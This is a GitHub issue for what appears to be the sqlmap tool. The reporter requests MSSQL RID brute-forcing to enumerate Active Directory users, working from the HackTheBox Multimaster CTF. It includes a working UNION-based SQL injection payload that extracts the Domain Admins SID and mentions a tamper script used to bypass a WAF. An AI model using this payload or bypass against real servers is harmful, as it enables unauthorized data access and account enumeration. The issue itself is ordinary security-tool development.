Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

MSSQL RID Bruteforce #4188

Open
uBadRequest opened this issue May 5, 2020 · 2 comments
Open

MSSQL RID Bruteforce #4188

uBadRequest opened this issue May 5, 2020 · 2 comments
Labels
feature request

Comments

@uBadRequest
Copy link

@uBadRequest uBadRequest commented May 5, 2020
edited
Loading

Is your feature request related to a problem? Please describe.
Yes, my feature request is related to a problem. While trying to get the SID for an Active Directory environment from a 2017 Microsoft SQL server, I was getting output that looked like this....

[02:48:21] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): 'ԁ\\u0000\\u0000Ԁ\\u0015\\u0000\\u001c병臑䧱�㛂Ȁ\\u0000'

If I use the hex flag, it looks like this...

[08:40:26] [INFO] fetching SQL SELECT statement query output: 'SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS')'
SELECT SUSER_SID('MEGACORP\DOMAIN ADMINS'): '\x01\x05\x00\x00\x00\x00\x00\x05\x15\x00\x00\x00\x1c\x00Ѽс\xf1I+\xdf\xc26\x00\x02\x00\x00'

I haven't had any luck at trying to decode this to the proper format.
The SID is ... 0x0105000000000005150000001C00D1BCD181F1492BDFC236 and I got this because someone leaked it online.
I was using the tamper charunicodeencode to bypass the WAF.

Describe the solution you'd like
Implement a method of retreiving the SID from a MSSQL server, and bruteforce users RID to discover the usernames of users in AD.

Describe alternatives you've considered
I've tried this ... https://github.com/Keramas/mssqli-duet ... but this wasn't working for me. Had to edit alot of the code and still couldn't get it to work.

Additional context
Incase you want to test out your implementation of this feature, this is from the HackTheBox CTF Multimaster.
@uBadRequest
Copy link
Author

@uBadRequest uBadRequest commented May 5, 2020

Maybe this should be a bug report instead...
I was able to manually execute this query,

-' union select 1,2,3,4,(select (select stuff(upper(sys.fn_varbintohexstr((SELECT
SUSER_SID('MEGACORP\Domain Admins')))), 1, 2, '')))-- -

but if I try with SQLMAP, it says...

[09:03:03] [WARNING] execution of non-query SQL statements is only available when stacked queries are supported

image

Loading

stamparm added a commit that referenced this issue May 5, 2020
@stamparm
Patch related to the #4188
5be407e
@stamparm
Copy link
Member

@stamparm stamparm commented May 5, 2020

With the latest revision query bug should be fixed. Nevertheless, I have a feeling that something else will come up

Loading

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
feature request
Projects
None yet
Milestone
No milestone
Linked pull requests

Successfully merging a pull request may close this issue.

None yet
2 participants
@stamparm @uBadRequest